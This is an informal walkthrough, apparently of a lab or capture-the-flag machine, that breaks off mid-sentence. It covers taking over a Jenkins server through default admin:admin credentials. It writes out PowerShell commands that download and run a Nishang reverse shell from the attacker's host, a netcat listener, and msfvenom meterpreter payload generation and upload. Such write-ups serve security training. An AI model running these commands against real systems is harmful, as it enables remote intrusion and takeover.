So first we can the machine and we see 3 ports open namely 80,8080,3389 so by just going to the pages we find out that the page 80 is the main website and its CI/CD is being handeled by Jenkins which is on port 8080 and if we traverse over there we get a login page .
We can try to first password spray admin on this page and try some default credentials if that doesnt work we can try to brute force but luckily for us my first guess which was admin:admin worked for us so now that we are logged in we see the dashboard which has a project in it which is most probably the site that is on port 80 now to locate the place where we can execute commands lets go to the project thats shown to us on the dashboard and then try to look inside the options there if we find something usefull around or something .After looking around for a while i found out that we can go to configure and scroll down and see the build coloumn where we can put the commands and stuff to execute on the machine and get a reverse shell.In here they recomend for us to use the reverse shell from the repo nishang the link to that is here →
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Also has a lot of other cool tools → https://github.com/samratashok/nishang
So now to get this revershell script to the machine then execute it first we need to download the Invoke-Powershelltcp.ps1 script on our local machine and then host it with
python -m SimpleHTTPServer 80
and then we can get it by the command they provided which is this one here this will get the file from our local server and then also call it for us
powershell iex (New-Object Net.WebClient).DownloadString('<http://your-ip>:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
now lets click on appply on the bottom left of our screen and then lets start to listen for the reverse shell and we do that using netcat so the syntax would be
nc -nvlp <PortDefinedintheabovescript>
and then in the jenkins menu we click build now and we will get a reverse shell on our nc listener and we can use that .Now you can cat out the users and everything .
Now to get a metasploit shell all we gotta do is use exploit/multi/handeler to listen instead of nc and send a payload that will allow us to get a meterpreter shell.
To do that we first generate the payload by doing this →
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
and then lets upload this shell to the target machine on the netcat shell.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
and now we set payload windows/meterpreter/reverse_tcp and also set lhost and lport.
and then run the exploit and lets listen for the shell on metasploit and now to execute the shell on the nc listener we use powershell and run the command